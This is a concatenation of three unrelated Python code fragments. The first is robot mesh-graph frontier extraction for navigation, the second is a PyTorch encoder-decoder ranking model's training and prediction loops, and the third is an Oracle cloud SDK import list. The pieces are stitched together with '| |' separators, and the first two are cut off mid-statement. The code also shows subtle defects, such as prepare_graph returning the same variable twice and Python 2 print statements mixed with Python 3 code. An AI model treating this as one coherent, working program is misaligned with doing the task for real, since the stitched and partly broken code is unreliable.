vertex_adj_faces = self.mesh.get_vertex_adjacent_faces(v)
for face_adjacent in vertex_adj_faces:
if face_adjacent != face_idx and G.has_node(face_adjacent):
G.add_edge(face_idx, face_adjacent, weight=1)
return G
def prepare_graph(self, G, source_id, target_id=None):
"""Filter and extract frontiers given a mesh graph. Remove outliers, join nearby traversable surfaces,
perform a border expansion to prevent collisions, etc.
:param G:
:param source_id: source node id
:param target_id: target node id
:return: G, f_centroids_ids, filtered_reachable_frontiers
"""
print "G size:", len(G.nodes)
G = self.filter_graph_by_traversable_faces(G)
print "G size:", len(G.nodes)
G = self.remove_non_connected_components(G, source_id)
mesh_frontiers = self.extract_frontiers_from_mesh()
graph_frontiers = self.extract_borders_from_graph(G, degree_tresh=12)
reachable_frontiers = mesh_frontiers.intersection(graph_frontiers)
G = self.expand_graph_borders(G)
# add important nodes that could be lost in previous filtering steps
checked_nodes = list(reachable_frontiers)
unchecked_nodes = [source_id]
if target_id:
unchecked_nodes.append(target_id)
G, reachable_frontiers = self.reconnect_non_removable_nodes(G,
checked_nodes,
unchecked_nodes=unchecked_nodes,
max_distance=self.border_threshold + 1.0)
G = self.remove_non_connected_components(G, source_id)
filtered_reachable_f_ids = reachable_frontiers.intersection(G.nodes())
f_centroids_ids = []
f_visit_ids = []
if len(filtered_reachable_f_ids) > 0:
f_visit_ids, f_centroids_ids, f_centroids, f_points = self.cluster_frontier_borders(G,
filtered_reachable_f_ids,
source_id)
return G, f_centroids_ids, f_centroids_ids, filtered_reachable_f_ids
def extract_borders_from_graph(self, G, degree_tresh=9):
"""Extract the nodes that has a degree less than two, this is a heuristic to detect which nodes
are located at the edges of the graph (such as obstacle borders and map border limits)
:param G:
:param degree_tresh: all nodes with degree less than degree_tresh are considered as border
:return: list of border node indices
"""
border_nodes = []
for v in sorted(G.nodes()):
if nx.degree(G, v) <= degree_tresh:
border_nodes.append(v)
return border_nodes
def filter_graph_by_traversable_faces(self, G):
"""Remove non traversable faces from the graph
CAUTION: this can return a non fully connected graph with multiple
smaller subgraphs
:param G:
:return: a graph with only traversable faces
"""
for face_idx in list(G.nodes()):
face_inclination = graph_search.MeshGraphSearch.calculate_traversal_angle(self.normals[face_idx])
if face_inclination > self.transversality_threshold:
G.remove_node(face_idx)
return G
def expand_graph_borders(self, G):
"""Remove nodes from a graph that are withing a distance treshold from the borders
this helps to generate routes where the robot could actually move (narrow passages) and prevent
collisions with obstacles and "static falls"
:param G:
:return: a smaller graph G' with the expanded borders removed
"""
# estimate borders of the remainder graph
border_centroids = []
for v in sorted(G.nodes()):
if nx.degree(G, v) <= 9:
border_centroids.append(tuple(self.centroids[v])) # tuples are hashable! lists are not
# remove nodes from graph that are near to the borders
# given a distance threshold
border_kdtree = spatial.KDTree(border_centroids)
for v in list(G.nodes()):
point = self.centroids[v]
distances, nearest_idx = border_kdtree.query([point])
obstacle_d = distances[0]
if obstacle_d <= self.border_threshold:
G.remove_node(v)
# remove small connected components
for component in list(nx.connected_components(G)):
if len(component) < 3:
for node in component:
G.remove_node(node)
return G
@staticmethod
def remove_non_connected_components(G, source):
"""Remove all unconnected components not connected to the source node (position of the robot)
:param G:
:param source:
:return: smaller G with the non connected components removed
"""
try:
conn_nodes = nx.node_connected_component(G, source)
return G.subgraph(conn_nodes).copy()
except Exception as e:
traceback.print_exc()
rospy.logerr('Error returning connected components %s', e.message)
return G
def reconnect_non_removable_nodes(self, G, checked_nodes, unchecked_nodes=None, max_distance=0.1):
"""Add non removable nodes to the graph which can be deleted by
previous filtering algorithms such as the source and destination points
The checked_nodes list will be added to the graph after validation for a maximum distance established by the
max_distance parameter. The unchecked_nodes will be added without previous validation, usefull for the start
and end nodes.
:param G: graph object
:param checked_nodes: nodes to check against a maximum distance threshold
:param unchecked_nodes:
:param max_distance:
:return: G with important nodes and edges added to it and nearest_checked_nodes, a list of the nearest
checked nodes
"""
nearest_checked_nodes = set()
if not unchecked_nodes:
unchecked_nodes = []
# check if the source, the target, and the frontiers are reachable
borderless_g_centroids = [tuple(self.centroids[v]) for v in sorted(G.nodes())]
assert | |
print("output_dim: ", str(output_dim))
# Train the autoencoder
if self.encoder.use_autoencoder:
self.encoder.autoencoder.fit(X)
start_epoch = 0
# Check for model checkpoint
checkpoint_file = os.path.join(self.checkpoint_dir, 'checkpoint.pth')
if os.path.exists(checkpoint_file):
check = torch.load(checkpoint_file)
self.encoder.load_state_dict(check['encoder'])
self.decoder.load_state_dict(check['decoder'])
encoder_optimizer.load_state_dict(check['encoder_optimizer'])
decoder_optimizer.load_state_dict(check['decoder_optimizer'])
loss = check['loss']
start_epoch = check['epoch'] + 1
print('loading from checkpoint, restarting at epoch', start_epoch)
# Train the model
for epoch in range(start_epoch, num_epochs):
print("epoch", str(epoch))
i = 0
while (i < num_examples):
batchXnp = X[i]
batchYnp = Y[i]
#if debug: print("batchX len:", str(len(batchXnp)), "batchY len:", str(len(batchYnp)))
if type(batchYnp) is list:
batchYnp = numpy.asarray(batchYnp)
batchYnp = batchYnp.astype('float64')
batchY = torch.tensor(batchYnp, dtype=torch.float64, device=tdevice, requires_grad=True)
#print("batchX size:", str(batchX.size()), "batchY size:", str(batchY.size()))
#if debug: print("batchX[0]:", str(batchXnp[0]))
#if debug: print("batchY size:", str(batchY.size()))
labels = batchY.view(1, -1, output_dim)
seq_length = labels.size(1)
#input_length = self.encoder.read_cycles
#if debug: print("seq_length:", str(seq_length))
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
#group_optimizer.zero_grad()
loss = 0
if len(batchXnp) > 0:
# Run the encoder
mem_block, encoder_hidden = self.encoder(batchXnp)
# Run the decoder
decoder_hidden = encoder_hidden
#print('decoder hidden:', decoder_hidden.size())
use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False
# Initialize the prediction
x_i = torch.zeros(hidden_size, dtype=torch.float64, device=tdevice)
output_indices = []
output_probs = []
correct_ranks = labels.squeeze()
flatten = False
#if self.group_thresh is not None:
# flatten = False
correct_indices = ranks_to_indices(correct_ranks.tolist(), flatten)
# INVERT the ranks?
if self.invert_ranks:
correct_indices.reverse()
num_timesteps = len(correct_indices)
print('num timesteps:', num_timesteps)
#if i==0: print('correct_indices:', correct_indices)
done_mask = torch.ones(seq_length, dtype=torch.float64, device=tdevice)
current_rank = []
x_list = []
# Run until we've picked all the items
#di = 0
#while torch.max(done_mask).item() > 0.0:
output_probs = []
target_probs = []
for di in range(num_timesteps):
print('di:', di)
index, decoder_hidden, done_mask, log_probs = self.decoder(x_i.view(1, -1), decoder_hidden, mem_block, done_mask, train=True)
#print('di:', di, 'mask:', done_mask)
output_probs.append(log_probs)
#output_probs.append(output_matrix.view(1, -1, 2))
# Select multiple items at each timestep
index = int(index.item())
x_i = mem_block[index]
# Teacher forcing for training
if use_teacher_forcing:
x_correct = mem_block[correct_indices[di]]
x_i = x_correct
for ei in correct_indices[di]:
done_mask[ei] = float('-inf')
'''
else:
x_i_list = []
for ei in range(seq_length):
print('output:', ei, output_matrix[ei])
ei_guess = torch.argmax(output_matrix[ei]) # See if 0 (yes) or 1 (no) was predicted
if ei_guess == 1:
print('choosing', ei)
done_mask[ei] = float('-inf')
x_i_list.append(mem_block[ei])
if len(x_i_list) == 0:
x_i = torch.zeros(self.hidden_size, dtype=torch.float64, device=tdevice)
else:
x_i = torch.stack(x_i_list, dim=0)
'''
# Average the chosen items to use as input to the decoder
x_i = x_i.view(-1, hidden_size)
if x_i.size(0) > 1:
x_i = torch.mean(x_i, dim=0)
#print('x_i:', x_i.size())
x_list.append(x_i)
# Create the target prob distribution
'''
target_tensor_zero = torch.zeros((seq_length, 1), dtype=torch.float64, device=tdevice, requires_grad=False)
target_tensor_one = torch.ones((seq_length, 1), dtype=torch.float64, device=tdevice, requires_grad=False)
target_tensor = torch.cat((target_tensor_one, target_tensor_zero), dim=1)
'''
target_tensor = torch.zeros((seq_length), dtype=torch.float64, device=tdevice, requires_grad=False)
#print('target_tensor size:', target_tensor.size())
if di < len(correct_indices):
for val in correct_indices[di]:
target_tensor[val] = 1.0
#target_tensor[val][0] = 0.0
#print('corr:', correct_indices[di], 'target_tensor:', target_tensor)
target_tensor = target_tensor.view(1, seq_length)
target_probs.append(target_tensor)
#print(di, 'target:', target_tensor)
#print(di, 'predic:', log_probs)
# Calculate loss per timestep
#loss += criterion(output_matrix.view(1, -1, 2), target_tensor)
#print('loss:', loss.item())
#loss.backward(retain_graph=True)
#encoder_optimizer.step()
#decoder_optimizer.step()
di += 1
output_indices.append(current_rank)
# Un-invert the ranks
if self.invert_ranks:
output_indices.reverse()
#output_ranks = indices_to_ranks(output_indices)
#if i==0: print('output_indices:', output_indices)
output_tensor = torch.stack(output_probs)
#print('output_probs:', output_tensor.size())
output_tensor = output_tensor.view(num_timesteps, seq_length)
if num_timesteps > 1:
target_tensor = torch.stack(target_probs)
#print('target_probs:', target_tensor.size())
target_tensor = target_tensor.view(num_timesteps, seq_length)
target_tensor = smooth_distribution(target_tensor, self.sigma)
else:
target_tensor = target_probs[0].view(1, -1)
print('target:', target_tensor)
#target_tensor = torch.log(target_tensor)
print('output tensor:', output_tensor)
#print('target smoothed:', target_tensor)
print('output:', output_tensor.size(), 'target:', target_tensor.size())
loss = criterion(output_tensor, target_tensor)
#loss = criterion(torch.tensor(output_ranks, dtype=torch.float, device=tdevice, requires_grad=True), correct_ranks)
print('loss:', loss.item())
loss.backward()
encoder_optimizer.step()
decoder_optimizer.step()
#return loss.item() / target_length
if (i) % print_every == 0:
print('Epoch [%d/%d], Loss: %.4f' %(epoch, num_epochs, loss.item()))
i += 1
# Save checkpoint
torch.save({'epoch': epoch, 'encoder': self.encoder.state_dict(), 'decoder': self.decoder.state_dict(),
'encoder_optimizer': encoder_optimizer.state_dict(), 'decoder_optimizer': decoder_optimizer.state_dict(), 'loss': loss},
os.path.join(self.checkpoint_dir, 'checkpoint.pth'))
print('Saved checkpoint for epoch', epoch)
print('training took', time.time()-start, 's')
def forward(self, x, batch_size=1, return_encodings=True):
#print("X 000:", str(type(testX[0][0][0])))
#print("X list:", str(len(x)))
outputs = []
max_di = 1000
encodings = []
# Run the model
batchXnp = x
#if debug: print("batchX len:", len(batchXnp))
#print("batchX size:", str(batchX.size()), "batchY size:", str(batchY.size()))
if debug: print("forward x:", str(batchXnp))
seq_length = len(batchXnp)
#input_length = self.encoder.read_cycles
#if debug: print("test seq_length:", str(seq_length))
if seq_length == 0:
output_ranks = []
else:
#with torch.no_grad():
# Run the encoder
mem_block, encoder_hidden = self.encoder(batchXnp)
if return_encodings:
encodings = mem_block
#encodings.append(mem_block)
# Run the decoder
decoder_hidden = encoder_hidden
# Initialize the prediction
x_i = torch.zeros(self.encoder.hidden_size, dtype=torch.float64, device=tdevice)
output_indices = []
done_mask = torch.ones(seq_length, dtype=torch.float64, device=tdevice)
# Run until we've picked all the items
chosen = []
di = 0
#avg_gap = 0.0
while torch.max(done_mask).item() > 0.0 and (di < max_di):
index, decoder_hidden, done_mask, log_probs = self.decoder(x_i.view(1, -1), decoder_hidden, mem_block, done_mask)
# Select multiple items at each timestep
index = int(index.item())
# Allow multiple events to be output at the same rank (prob threshold?)
log_probs = log_probs * done_mask
# Fix any nans
for li in range(log_probs.size(0)):
if math.isnan(log_probs[li]) or done_mask[li] == float('-inf'):
log_probs[li] = float('-inf')
print('test di:', di, 'mask:', done_mask)
print('log_probs:', log_probs)
max_tensor, index_tensor = torch.max(log_probs, dim=0)
#target_index = int(index_tensor.item())
max_prob = max_tensor.item()
#print('max_prob:', max_prob)
targets = []
n = float(log_probs.size(0))
#print('n:', n)
for j in range(log_probs.size(0)):
if done_mask[j] > 0.0:# or max_prob == 0.0:
prob = log_probs[j]
if (math.fabs(max_prob - prob) <= (self.group_thresh)) or math.isinf(max_prob):
targets.append(j)
print('choosing item', j, 'with prob', log_probs[j].item())
done_mask[j] = float('-inf')
if len(targets) > 0:
output_indices.append(targets)
xi_list = []
x_i = torch.zeros(self.hidden_size, dtype=torch.float64, device=tdevice)
print('targets:', len(targets), targets)
for ti in targets:
x_i = mem_block[ti]
xi_list.append(x_i)
if len(xi_list) > 1:
x_i = torch.mean(torch.stack(xi_list), dim=0)
#print('test x_i:', x_i.size())
di += 1
# End torch.no_grad
#output_indices.append(current_rank)
# Un-invert the ranks
if self.invert_ranks:
output_indices.reverse()
output_ranks = indices_to_ranks(output_indices)
print('output_ranks:', output_ranks)
# end if seq_length > 0
outputs = torch.tensor(output_ranks, dtype=torch.float).view(1, -1)
#outputs.append(output_ranks)
if not return_encodings:
del mem_block
del encoder_hidden
torch.cuda.empty_cache()
if return_encodings:
return outputs, encodings
else:
return outputs
def predict(self, testX, batch_size=1, return_encodings=False):
#print("X 000:", str(type(testX[0][0][0])))
#print("X list:", str(len(testX)))
outputs = []
max_di = 1000
encodings = []
# Run the model
for i in range(len(testX)):
batchXnp = testX[i]
#if debug: print("batchX len:", len(batchXnp))
#print("batchX size:", str(batchX.size()), "batchY size:", str(batchY.size()))
#if debug: print("testX[0]:", str(batchXnp[0]))
seq_length = len(batchXnp)
#input_length = self.encoder.read_cycles
#if debug: print("test seq_length:", str(seq_length))
if seq_length == 0:
output_ranks = []
encodings.append(None)
else:
with torch.no_grad():
# Run the encoder
mem_block, encoder_hidden = self.encoder(batchXnp)
if return_encodings:
encodings.append(mem_block)
# Run the decoder
decoder_hidden = encoder_hidden
# Initialize the prediction
x_i = torch.zeros(self.encoder.hidden_size, dtype=torch.float64, device=tdevice)
output_indices = []
done_mask = torch.ones(seq_length, dtype=torch.float64, device=tdevice)
# Run until we've picked all the items
#current_rank = []
#x_list = []
# Run until we've picked all the items
chosen = []
di = 0
#avg_gap = 0.0
while torch.max(done_mask).item() > 0.0 and (di < max_di):
index, decoder_hidden, done_mask, log_probs = self.decoder(x_i.view(1, -1), decoder_hidden, mem_block, done_mask)
# Select multiple items at each timestep
index = int(index.item())
# Allow multiple events to be output at the same rank (prob threshold?)
log_probs = log_probs * done_mask
# Fix any nans
for li in range(log_probs.size(0)):
if math.isnan(log_probs[li]) or done_mask[li] == float('-inf'):
log_probs[li] = float('-inf')
print('test di:', di, 'mask:', done_mask)
print('log_probs:', log_probs)
max_tensor, index_tensor = torch.max(log_probs, dim=0)
#target_index = int(index_tensor.item())
max_prob = max_tensor.item()
#print('max_prob:', max_prob)
targets = []
n = float(log_probs.size(0))
#print('n:', n)
# Elastic probability threshold
'''
if di == 0:
if math.isinf(max_prob):
avg_gap = 0.0
else:
probs2 = log_probs.tolist()
sorted_probs = []
for prob in probs2:
if not math.isinf(prob): # Ignore -inf values
sorted_probs.append(prob)
# Remove outliers
elements = numpy.array(sorted_probs)
prob_mean = numpy.mean(elements, axis=0)
prob_sd = numpy.std(elements, axis=0)
sorted_probs = [x for x in sorted_probs if (x > prob_mean - 1 * prob_sd)]
sorted_probs = [x for x in sorted_probs if (x < prob_mean + 1 * prob_sd)]
if len(sorted_probs) < 2: # Make sure there are at least 2 probs left
avg_gap = 0.0
else:
sorted(sorted_probs, reverse=True)
gaps = []
for gindex in range(1, len(sorted_probs)):
gval = sorted_probs[gindex]
prev = sorted_probs[gindex-1]
diff = math.fabs(gval-prev)
gaps.append(diff)
avg_gap = torch.mean(torch.tensor(gaps, dtype=torch.float64, device=tdevice)).item()/2.0
#print('avg_gap:', avg_gap)
'''
for j in range(log_probs.size(0)):
if done_mask[j] > 0.0:# or max_prob == 0.0:
prob = log_probs[j]
if (math.fabs(max_prob - prob) <= (self.group_thresh)) | |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .add_em_managed_external_exadata_insight_members_details import AddEmManagedExternalExadataInsightMembersDetails
from .add_exadata_insight_members_details import AddExadataInsightMembersDetails
from .autonomous_database_configuration_summary import AutonomousDatabaseConfigurationSummary
from .autonomous_database_insight import AutonomousDatabaseInsight
from .autonomous_database_insight_summary import AutonomousDatabaseInsightSummary
from .awr_hub import AwrHub
from .awr_hub_summary import AwrHubSummary
from .awr_hub_summary_collection import AwrHubSummaryCollection
from .awr_hubs import AwrHubs
from .awr_report import AwrReport
from .awr_snapshot_collection import AwrSnapshotCollection
from .awr_snapshot_summary import AwrSnapshotSummary
from .awr_source_summary import AwrSourceSummary
from .change_database_insight_compartment_details import ChangeDatabaseInsightCompartmentDetails
from .change_enterprise_manager_bridge_compartment_details import ChangeEnterpriseManagerBridgeCompartmentDetails
from .change_exadata_insight_compartment_details import ChangeExadataInsightCompartmentDetails
from .change_host_insight_compartment_details import ChangeHostInsightCompartmentDetails
from .change_operations_insights_private_endpoint_compartment_details import ChangeOperationsInsightsPrivateEndpointCompartmentDetails
from .change_pe_comanaged_database_insight_details import ChangePeComanagedDatabaseInsightDetails
from .connection_details import ConnectionDetails
from .create_awr_hub_details import CreateAwrHubDetails
from .create_database_insight_details import CreateDatabaseInsightDetails
from .create_em_managed_external_database_insight_details import CreateEmManagedExternalDatabaseInsightDetails
from .create_em_managed_external_exadata_insight_details import CreateEmManagedExternalExadataInsightDetails
from .create_em_managed_external_exadata_member_entity_details import CreateEmManagedExternalExadataMemberEntityDetails
from .create_em_managed_external_host_insight_details import CreateEmManagedExternalHostInsightDetails
from .create_enterprise_manager_bridge_details import CreateEnterpriseManagerBridgeDetails
from .create_exadata_insight_details import CreateExadataInsightDetails
from .create_host_insight_details import CreateHostInsightDetails
from .create_macs_managed_external_host_insight_details import CreateMacsManagedExternalHostInsightDetails
from .create_operations_insights_private_endpoint_details import CreateOperationsInsightsPrivateEndpointDetails
from .create_operations_insights_warehouse_details import CreateOperationsInsightsWarehouseDetails
from .create_operations_insights_warehouse_user_details import CreateOperationsInsightsWarehouseUserDetails
from .create_pe_comanaged_database_insight_details import CreatePeComanagedDatabaseInsightDetails
from .credential_by_vault import CredentialByVault
from .credential_details import CredentialDetails
from .credentials_by_source import CredentialsBySource
from .db_external_instance import DBExternalInstance
from .db_external_properties import DBExternalProperties
from .dbos_config_instance import DBOSConfigInstance
from .database_configuration_collection import DatabaseConfigurationCollection
from .database_configuration_metric_group import DatabaseConfigurationMetricGroup
from .database_configuration_summary import DatabaseConfigurationSummary
from .database_details import DatabaseDetails
from .database_insight import DatabaseInsight
from .database_insight_summary import DatabaseInsightSummary
from .database_insights import DatabaseInsights
from .database_insights_collection import DatabaseInsightsCollection
from .disk_group_details import DiskGroupDetails
from .download_operations_insights_warehouse_wallet_details import DownloadOperationsInsightsWarehouseWalletDetails
from .em_managed_external_database_configuration_summary import EmManagedExternalDatabaseConfigurationSummary
from .em_managed_external_database_insight import EmManagedExternalDatabaseInsight
from .em_managed_external_database_insight_summary import EmManagedExternalDatabaseInsightSummary
from .em_managed_external_exadata_insight import EmManagedExternalExadataInsight
from .em_managed_external_exadata_insight_summary import EmManagedExternalExadataInsightSummary
from .em_managed_external_host_configuration_summary import EmManagedExternalHostConfigurationSummary
from .em_managed_external_host_insight import EmManagedExternalHostInsight
from .em_managed_external_host_insight_summary import EmManagedExternalHostInsightSummary
from .enable_database_insight_details import EnableDatabaseInsightDetails
from .enable_em_managed_external_database_insight_details import EnableEmManagedExternalDatabaseInsightDetails
from .enable_em_managed_external_exadata_insight_details import EnableEmManagedExternalExadataInsightDetails
from .enable_em_managed_external_host_insight_details import EnableEmManagedExternalHostInsightDetails
from .enable_exadata_insight_details import EnableExadataInsightDetails
from .enable_host_insight_details import EnableHostInsightDetails
from .enable_macs_managed_external_host_insight_details import EnableMacsManagedExternalHostInsightDetails
from .enable_pe_comanaged_database_insight_details import EnablePeComanagedDatabaseInsightDetails
from .enterprise_manager_bridge import EnterpriseManagerBridge
from .enterprise_manager_bridge_collection import EnterpriseManagerBridgeCollection
from .enterprise_manager_bridge_summary import EnterpriseManagerBridgeSummary
from .enterprise_manager_bridges import EnterpriseManagerBridges
from .exadata_configuration_collection import ExadataConfigurationCollection
from .exadata_configuration_summary import ExadataConfigurationSummary
from .exadata_database_machine_configuration_summary import ExadataDatabaseMachineConfigurationSummary
from .exadata_database_statistics_summary import ExadataDatabaseStatisticsSummary
from .exadata_details import ExadataDetails
from .exadata_diskgroup_statistics_summary import ExadataDiskgroupStatisticsSummary
from .exadata_host_statistics_summary import ExadataHostStatisticsSummary
from .exadata_insight import ExadataInsight
from .exadata_insight_resource_capacity_trend_aggregation import ExadataInsightResourceCapacityTrendAggregation
from .exadata_insight_resource_capacity_trend_summary import ExadataInsightResourceCapacityTrendSummary
from .exadata_insight_resource_forecast_trend_summary import ExadataInsightResourceForecastTrendSummary
from .exadata_insight_resource_insight_utilization_item import ExadataInsightResourceInsightUtilizationItem
from .exadata_insight_resource_statistics import ExadataInsightResourceStatistics
from .exadata_insight_resource_statistics_aggregation import ExadataInsightResourceStatisticsAggregation
from .exadata_insight_summary import ExadataInsightSummary
from .exadata_insight_summary_collection import ExadataInsightSummaryCollection
from .exadata_insights import ExadataInsights
from .exadata_member_collection import ExadataMemberCollection
from .exadata_member_summary import ExadataMemberSummary
from .exadata_storage_server_statistics_summary import ExadataStorageServerStatisticsSummary
from .historical_data_item import HistoricalDataItem
from .host_configuration_collection import HostConfigurationCollection
from .host_configuration_metric_group import HostConfigurationMetricGroup
from .host_configuration_summary import HostConfigurationSummary
from .host_cpu_hardware_configuration import HostCpuHardwareConfiguration
from .host_cpu_statistics import HostCpuStatistics
from .host_cpu_usage import HostCpuUsage
from .host_details import HostDetails
from .host_entities import HostEntities
from .host_hardware_configuration import HostHardwareConfiguration
from .host_importable_agent_entity_summary import HostImportableAgentEntitySummary
from .host_insight import HostInsight
from .host_insight_resource_statistics_aggregation import HostInsightResourceStatisticsAggregation
from .host_insight_summary import HostInsightSummary
from .host_insight_summary_collection import HostInsightSummaryCollection
from .host_insights import HostInsights
from .host_instance_map import HostInstanceMap
from .host_memory_configuration import HostMemoryConfiguration
from .host_memory_statistics import HostMemoryStatistics
from .host_memory_usage import HostMemoryUsage
from .host_network_activity_summary import HostNetworkActivitySummary
from .host_network_configuration import HostNetworkConfiguration
from .host_performance_metric_group import HostPerformanceMetricGroup
from .host_product import HostProduct
from .host_resource_allocation import HostResourceAllocation
from .host_resource_capacity_trend_aggregation import HostResourceCapacityTrendAggregation
from .host_resource_statistics import HostResourceStatistics
from .host_top_processes import HostTopProcesses
from .hosted_entity_collection import HostedEntityCollection
from .hosted_entity_summary import HostedEntitySummary
from .importable_agent_entity_summary import ImportableAgentEntitySummary
from .importable_agent_entity_summary_collection import ImportableAgentEntitySummaryCollection
from .importable_enterprise_manager_entity import ImportableEnterpriseManagerEntity
from .importable_enterprise_manager_entity_collection import ImportableEnterpriseManagerEntityCollection
from .ingest_database_configuration_details import IngestDatabaseConfigurationDetails
from .ingest_database_configuration_response_details import IngestDatabaseConfigurationResponseDetails
from .ingest_host_configuration_details import IngestHostConfigurationDetails
from .ingest_host_configuration_response_details import IngestHostConfigurationResponseDetails
from .ingest_host_metrics_details import IngestHostMetricsDetails
from .ingest_host_metrics_response_details import IngestHostMetricsResponseDetails
from .ingest_sql_bucket_details import IngestSqlBucketDetails
from .ingest_sql_bucket_response_details import IngestSqlBucketResponseDetails
from .ingest_sql_plan_lines_details import IngestSqlPlanLinesDetails
from .ingest_sql_plan_lines_response_details import IngestSqlPlanLinesResponseDetails
from .ingest_sql_stats_details import IngestSqlStatsDetails
from .ingest_sql_stats_response_details import IngestSqlStatsResponseDetails
from .ingest_sql_text_details import IngestSqlTextDetails
from .ingest_sql_text_response_details import IngestSqlTextResponseDetails
from .instance_metrics import InstanceMetrics
from .macs_managed_external_database_configuration_summary import MacsManagedExternalDatabaseConfigurationSummary
from .macs_managed_external_database_insight import MacsManagedExternalDatabaseInsight
from .macs_managed_external_database_insight_summary import MacsManagedExternalDatabaseInsightSummary
from .macs_managed_external_host_configuration_summary import MacsManagedExternalHostConfigurationSummary
from .macs_managed_external_host_insight import MacsManagedExternalHostInsight
from .macs_managed_external_host_insight_summary import MacsManagedExternalHostInsightSummary
from .operations_insights_private_endpoint import OperationsInsightsPrivateEndpoint
from .operations_insights_private_endpoint_collection import OperationsInsightsPrivateEndpointCollection
from .operations_insights_private_endpoint_summary import OperationsInsightsPrivateEndpointSummary
from .operations_insights_warehouse import OperationsInsightsWarehouse
from .operations_insights_warehouse_summary import OperationsInsightsWarehouseSummary
from .operations_insights_warehouse_summary_collection import OperationsInsightsWarehouseSummaryCollection
from .operations_insights_warehouse_user import OperationsInsightsWarehouseUser
from .operations_insights_warehouse_user_summary import OperationsInsightsWarehouseUserSummary
from .operations_insights_warehouse_user_summary_collection import OperationsInsightsWarehouseUserSummaryCollection
from .operations_insights_warehouse_users import OperationsInsightsWarehouseUsers
from .operations_insights_warehouses import OperationsInsightsWarehouses
from .pe_comanaged_database_connection_details import PeComanagedDatabaseConnectionDetails
from .pe_comanaged_database_host_details import PeComanagedDatabaseHostDetails
from .pe_comanaged_database_insight import PeComanagedDatabaseInsight
from .pe_comanaged_database_insight_summary import PeComanagedDatabaseInsightSummary
from .pe_comanaged_managed_external_database_configuration_summary import PeComanagedManagedExternalDatabaseConfigurationSummary
from .projected_data_item import ProjectedDataItem
from .resource_capacity_trend_aggregation import ResourceCapacityTrendAggregation
from .resource_insight_current_utilization import ResourceInsightCurrentUtilization
from .resource_insight_projected_utilization import ResourceInsightProjectedUtilization
from .resource_insight_projected_utilization_item import ResourceInsightProjectedUtilizationItem
from .resource_statistics import ResourceStatistics
from .resource_statistics_aggregation import ResourceStatisticsAggregation
from .resource_usage_summary import ResourceUsageSummary
from .resource_usage_trend_aggregation import ResourceUsageTrendAggregation
from .sql_bucket import SqlBucket
from .sql_insight_aggregation import SqlInsightAggregation
from .sql_insight_aggregation_collection import SqlInsightAggregationCollection
from .sql_insight_thresholds import SqlInsightThresholds
from .sql_inventory import SqlInventory
from .sql_plan_collection import SqlPlanCollection
from .sql_plan_insight_aggregation import SqlPlanInsightAggregation
from .sql_plan_insight_aggregation_collection import SqlPlanInsightAggregationCollection
from .sql_plan_insights import SqlPlanInsights
from .sql_plan_line import SqlPlanLine
from .sql_plan_summary import SqlPlanSummary
from .sql_response_time_distribution_aggregation import SqlResponseTimeDistributionAggregation
from .sql_response_time_distribution_aggregation_collection import SqlResponseTimeDistributionAggregationCollection
from .sql_search_collection import SqlSearchCollection
from .sql_search_summary import SqlSearchSummary
from .sql_statistic_aggregation import SqlStatisticAggregation
from .sql_statistic_aggregation_collection import SqlStatisticAggregationCollection
from .sql_statistics import SqlStatistics
from .sql_statistics_time_series import SqlStatisticsTimeSeries
from .sql_statistics_time_series_aggregation import SqlStatisticsTimeSeriesAggregation
from .sql_statistics_time_series_aggregation_collection import SqlStatisticsTimeSeriesAggregationCollection
from .sql_statistics_time_series_by_plan_aggregation import SqlStatisticsTimeSeriesByPlanAggregation
from .sql_statistics_time_series_by_plan_aggregation_collection import SqlStatisticsTimeSeriesByPlanAggregationCollection
from .sql_stats import SqlStats
from .sql_text import SqlText
from .sql_text_collection import SqlTextCollection
from .sql_text_summary import SqlTextSummary
from .storage_server_details import StorageServerDetails
from .summarize_awr_sources_summaries_collection import SummarizeAwrSourcesSummariesCollection
from .summarize_database_insight_resource_capacity_trend_aggregation_collection import SummarizeDatabaseInsightResourceCapacityTrendAggregationCollection
from .summarize_database_insight_resource_forecast_trend_aggregation import SummarizeDatabaseInsightResourceForecastTrendAggregation
from .summarize_database_insight_resource_statistics_aggregation_collection import SummarizeDatabaseInsightResourceStatisticsAggregationCollection
from .summarize_database_insight_resource_usage_aggregation import SummarizeDatabaseInsightResourceUsageAggregation
from .summarize_database_insight_resource_usage_trend_aggregation_collection import SummarizeDatabaseInsightResourceUsageTrendAggregationCollection
from .summarize_database_insight_resource_utilization_insight_aggregation import SummarizeDatabaseInsightResourceUtilizationInsightAggregation
from .summarize_database_insight_tablespace_usage_trend_aggregation_collection import SummarizeDatabaseInsightTablespaceUsageTrendAggregationCollection
from .summarize_exadata_insight_resource_capacity_trend_aggregation import SummarizeExadataInsightResourceCapacityTrendAggregation
from .summarize_exadata_insight_resource_capacity_trend_collection import SummarizeExadataInsightResourceCapacityTrendCollection
from .summarize_exadata_insight_resource_forecast_trend_aggregation import SummarizeExadataInsightResourceForecastTrendAggregation
from .summarize_exadata_insight_resource_forecast_trend_collection import SummarizeExadataInsightResourceForecastTrendCollection
from .summarize_exadata_insight_resource_statistics_aggregation_collection import SummarizeExadataInsightResourceStatisticsAggregationCollection
from .summarize_exadata_insight_resource_usage_aggregation import SummarizeExadataInsightResourceUsageAggregation
from .summarize_exadata_insight_resource_usage_collection import SummarizeExadataInsightResourceUsageCollection
from .summarize_exadata_insight_resource_utilization_insight_aggregation import SummarizeExadataInsightResourceUtilizationInsightAggregation
from .summarize_host_insight_resource_capacity_trend_aggregation_collection import SummarizeHostInsightResourceCapacityTrendAggregationCollection
from .summarize_host_insight_resource_forecast_trend_aggregation import SummarizeHostInsightResourceForecastTrendAggregation
from .summarize_host_insight_resource_statistics_aggregation_collection import SummarizeHostInsightResourceStatisticsAggregationCollection
from .summarize_host_insight_resource_usage_aggregation import SummarizeHostInsightResourceUsageAggregation
from .summarize_host_insight_resource_usage_trend_aggregation_collection import SummarizeHostInsightResourceUsageTrendAggregationCollection
from .summarize_host_insight_resource_utilization_insight_aggregation import SummarizeHostInsightResourceUtilizationInsightAggregation
from .summarize_host_insights_top_processes_usage_trend_collection import SummarizeHostInsightsTopProcessesUsageTrendCollection
from .summarize_operations_insights_warehouse_resource_usage_aggregation import SummarizeOperationsInsightsWarehouseResourceUsageAggregation
